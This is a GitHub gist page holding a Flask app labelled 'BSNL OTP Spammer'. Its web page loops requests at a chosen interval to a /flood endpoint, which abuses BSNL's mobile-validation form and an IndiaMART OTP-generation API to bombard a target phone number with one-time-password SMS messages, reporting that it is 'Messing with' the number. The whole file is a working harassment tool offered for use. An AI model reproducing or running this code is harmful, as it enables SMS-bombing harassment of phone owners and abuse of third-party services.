Skip to content

Instantly share code, notes, and snippets.

@smartm13

smartm13/flask_app.py

Created May 31, 2017 06:06
Show Gist options
  • Save smartm13/a232a669f885b62ed4374b1025ec7493 to your computer and use it in GitHub Desktop.
Save smartm13/a232a669f885b62ed4374b1025ec7493 to your computer and use it in GitHub Desktop.
Download ZIP
BSNL OTP Spammer
Raw
flask_app.py
from flask import Flask,request,Response
import requests,json
app = Flask(__name__)
app.config['DEBUG'] = True
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, nothing at this URL.', 404
def makecookie(setcookie):
# """Return dict of cookies from value of setcookie header [formated 'atr=val; ']"""
cok={}
s=0
t=setcookie
while 1:
s=t.find('=',s)+1
if not s:break
e=None if t.find(';',s)==-1 else t.find(';',s)
val=t[s:e]
sw=t.rfind(" ",0,s) #find space just b4 s
atr=t[sw+1:s-1]
cok[atr]=val
return cok
@app.route('/bsnl')
def bsnlH():
return """
<html>
<body>
Attempted <h2 style="display: inline"><span id='num'>0</span></h2> times.<br>Attempting <span id='total'>0</span> :<button id='bt'>Pause</button><p id='update'></p>
<script>
var log=0;
var interval;
document.getElementById("bt").addEventListener("click", function(){
action=document.getElementById("bt").innerHTML;
if (action=='Pause')
{
clearInterval(interval);
document.getElementById("bt").innerHTML='Resume';
} else {
document.getElementById("bt").innerHTML='Pause';
loadinit();
}
});
function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,
function(m,key,value) {
vars[key] = value;
});
if (!vars['gap']) {vars['gap']=1000;}
vars['gap']=parseInt(vars['gap']);
return vars;
}
function init(){
var i;var j;var k;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (xhttp.readyState == 4 && xhttp.status == 200) {
document.getElementById("num").innerHTML = parseInt(document.getElementById("num").innerHTML)+1;
document.getElementById("update").innerHTML = (JSON.parse(xhttp.responseText))['show'];
log=(JSON.parse(xhttp.responseText))['log'];
}
};
xhttp.open("GET", "flood?p="+getUrlVars()["phno"], true);
xhttp.send();
document.getElementById("total").innerHTML = parseInt(document.getElementById("total").innerHTML)+1;
}
function loadinit(){interval=setInterval(init,getUrlVars()['gap'])}
window.onload =loadinit;
</script>
</body>
</html>
"""
@app.route('/flood')
def bsnl():
mob=request.args['p']
blacklist={}#"9409261078":"ZOHAN!!!","9998623001":"Batman."}
url="http://portal2.bsnl.in/myportal/validatemobile.do";
web="http://portal2.bsnl.in";
ccmob=''.join([x for x in str(mob) if x.isdigit()])
url2='http://mapi.indiamart.com/wservce/users/verification/?&modid=IMHOME&mobile_num={}&user_mobile_country_code={}&flag=OTPGen&glid=1'.format(ccmob[-10:],ccmob[:-10])
r=0
if blacklist.has_key(mob):mob=blacklist[mob]
else:r=requests.get(url2) if len(mob)!=10 else requests.post(url,data="mobile="+mob,headers={"Referer":web,'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'})
returns= json.dumps({'show':"Messing with "+mob,'log':unicode(r.content if r else 'failed',errors='ignore')})
resp = Response(returns)
sender=request.headers.get('origin')
resp.headers['Access-Control-Allow-Origin'] = sender if sender in ['https://smartm13.github.io','http://smartm13.github.io'] else "SAME-ORIGIN"
try:resp.headers['Content-type']='text/html; charset=utf-8; data='+makecookie(r.headers['set-cookie'])['JSESSIONID']
except:pass#resp.headers['sentdata']='null'
return resp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment